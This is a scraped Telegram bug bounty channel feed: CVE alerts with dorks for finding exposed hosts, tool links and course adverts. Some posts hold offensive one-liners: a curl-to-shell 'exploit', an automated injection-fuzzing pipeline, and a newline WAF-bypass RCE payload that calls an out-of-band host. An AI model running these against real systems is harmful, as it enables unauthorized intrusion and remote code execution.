Brut Security
14.8K subscribers
952 photos
76 videos
290 files
996 links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: [email protected]
Download Telegram
CVE-2025-2294: Path Traversal in Kubio WordPress plugin, 9.8 rating πŸ”₯

A vulnerability found in a popular plugin allows unauthenticated attackers to execute any code in PHP files on the server.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/iOqr6
πŸ‘‰ Dork: http.body:"plugins/kubio"

Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
πŸ‘6πŸ”₯3
Big bounty tips ✨️ - CRLF injection

#bugbounty #bugbountytips
πŸ‘19πŸ‘6
APIs Fuzzing for Bug Bounty.pdf
164.9 KB
πŸ”₯15πŸ‘6❀2πŸ€”2
πŸ’₯CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
β€œ. <(curl -SsfL https://thc.org/7350pipe)”
🀣29πŸ—Ώ14😁2❀1
πŸ”₯ Discover Web Vulns Like a Pro! πŸ”₯
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Here’s a killer one-liner I’ve been using:


gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt



What’s it do?
1️⃣ Grabs URLs: gau digs up every URL for
target.com from the web’s archives.
2️⃣ Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3️⃣ Sets the Trap: qsreplace swaps values with FUZZ for testing.
4️⃣ Fuzzes Hard: ffuf blasts payloads from my custom listsβ€”XSS popups, file leaks, you name it!
5️⃣ Saves the Loot: Results land in param_vulns.txt for you to exploit.


πŸ’‘ Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!

Curious about hacking tricks like this? Join my crew at
https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
πŸ‘19❀8πŸ—Ώ8
😍
🀣48😱5
CVE-2025-3083, -3084, -3085: Vulnerabilities in MongoDB, 6.5 - 8.1 rating❗️

Vulnerabilities in some versions of MongoDB allow attackers to perform DoS and gain unauthorized access using revoked certificates.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/aqCrV
πŸ‘‰ Dork: mongodb.build_info.version:[6.0.0 TO 6.0.20] OR mongodb.build_info.version:[5.0.0 TO 5.0.31] OR mongodb.build_info.version:[7.0.0 TO 7.0.16]

Vendor's advisory: https://jira.mongodb.org/browse/SERVER-95445
πŸ‘3
Let's have some fun 🀩
πŸ”₯14πŸ‘4
Freelance Security Analyst for CTF Challenge

Job Type: Freelance | Remote | Short-term

We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in:
βœ” Web Exploitation, Reverse Engineering, Cryptography, Forensics, OSINT
βœ” CTF platforms (Hack The Box, TryHackMe, PicoCTF, etc.)
βœ” Tools like Burp Suite, Wireshark, Ghidra, IDA Pro, Metasploit
βœ” Ethical hacking & exploit development (OSCP, CEH preferred)

πŸ“© Send your resume to
[email protected] or WhatsApp +91-8016167754.

Let’s solve this challenge together!
πŸ‘15❀6
Brut Security pinned Β«Freelance Security Analyst for CTF Challenge Job Type: Freelance | Remote | Short-term We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in: βœ” Web Exploitation, Reverse Engineering, Cryptography, Forensics…»
Use TLSx to detect certificate misconfigurations πŸ”

Use this command to check for expired, self-signed, mismatched, revoked AND untrusted certificates πŸ‘‡
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯46πŸ‘2
Don't Forget To Drop Likes πŸ‘€
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘11🐳3
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.

https://github.com/ifconfig-me/SQLi-Scanner
πŸ‘28πŸ”₯7❀3🀝2
CVE-2025-22457: RCE in Ivanti Connect Secure, 9.0 rating πŸ”₯

A buffer overflow in Ivanti Connect Secure allows an unauthenticated attacker to perform remote code execution.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/zsWig
πŸ‘‰ Dork: http.body:"welcome.cgi?p=logo"

Vendor's advisory: https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US
❀5πŸ‘3
πŸ”₯ Web Pentesting & Bug Bounty Batch – Starting April!

Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.

βœ… Weekday & Weekend Batches – Evening Slots (IST)
βœ… Hands-on Labs & Live Automations
βœ… Bug Bounty Methodologies & Practical Hunting
βœ… Community Support & Private POC Access

πŸ“© Limited slots! Enroll now and take your hacking skills to the next level.

πŸ“± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
πŸ‘5❀1
⚠️CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applications.

https://github.com/musana/CF-Hero
Please open Telegram to view this post
VIEW IN TELEGRAM
❀11πŸ”₯8πŸ—Ώ4
🀫30 Cybersecurity search enginesπŸ”₯
πŸ‘13πŸ—Ώ5
domains.txt
836.9 KB
πŸŒ€Download all bug bounty programs domains in scope items 🎯

πŸ˜‰Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!πŸ’₯

πŸ‘‡πŸΌStep 1: Download the domains.txt file

πŸ“‚step 2: Extract only main/root domains

`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`

πŸ“‚Step 3: Extract all IP addresses:

`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`

Don't forget to give reactions❀️
πŸ”₯27πŸ‘12❀11
πŸ”₯Top 25 Bug Bounty Platform πŸ’°

01. Bugcrowd
02. HackerOne
03. Intigriti
04. YesWeHack
05. Synack, Inc.
06. HackenProof | Web3 bug bounty platform
07. Open Bug Bounty
08. Immunefi
09. Cobalt
10. Zerocopter
11. Yogosha
12. SafeHats
13. Vulnerability Research Labs, LLC
14. AntiHACKme Pte Ltd
15. RedStorm Information Security
16. Cyber Army Indonesia
17. Hacktrophy
18. Nordic Defender
19. Capture The Bug
20. Bugbounter
21. Detectify
22. BugBase
23. huntr
24. Pentabug
25. SecureBug

Happy Hunt ❀️
πŸ”₯23πŸ‘7❀1
⚑Top 25 Cybersecurity projects in GitHub, those are really awesome 😎
πŸ‘21❀3πŸ”₯1
πŸ”₯Never forget to check for blind RCE!πŸ’₯

I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:

;id | whoami & uname

But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE β€” still blocked.

Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?

Payload idea: Inject a newline before the actual payload:

attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun

(Use %0a for newline β€” URL encoded)

And boom β€” Blind RCE triggered! My server got the hit instantly.

Cybersecurity isn’t about effort β€” it’s about mindset. Deep thinking always wins over brute force.❀️
DarkShadow
❀34πŸ‘9πŸ”₯7🐳3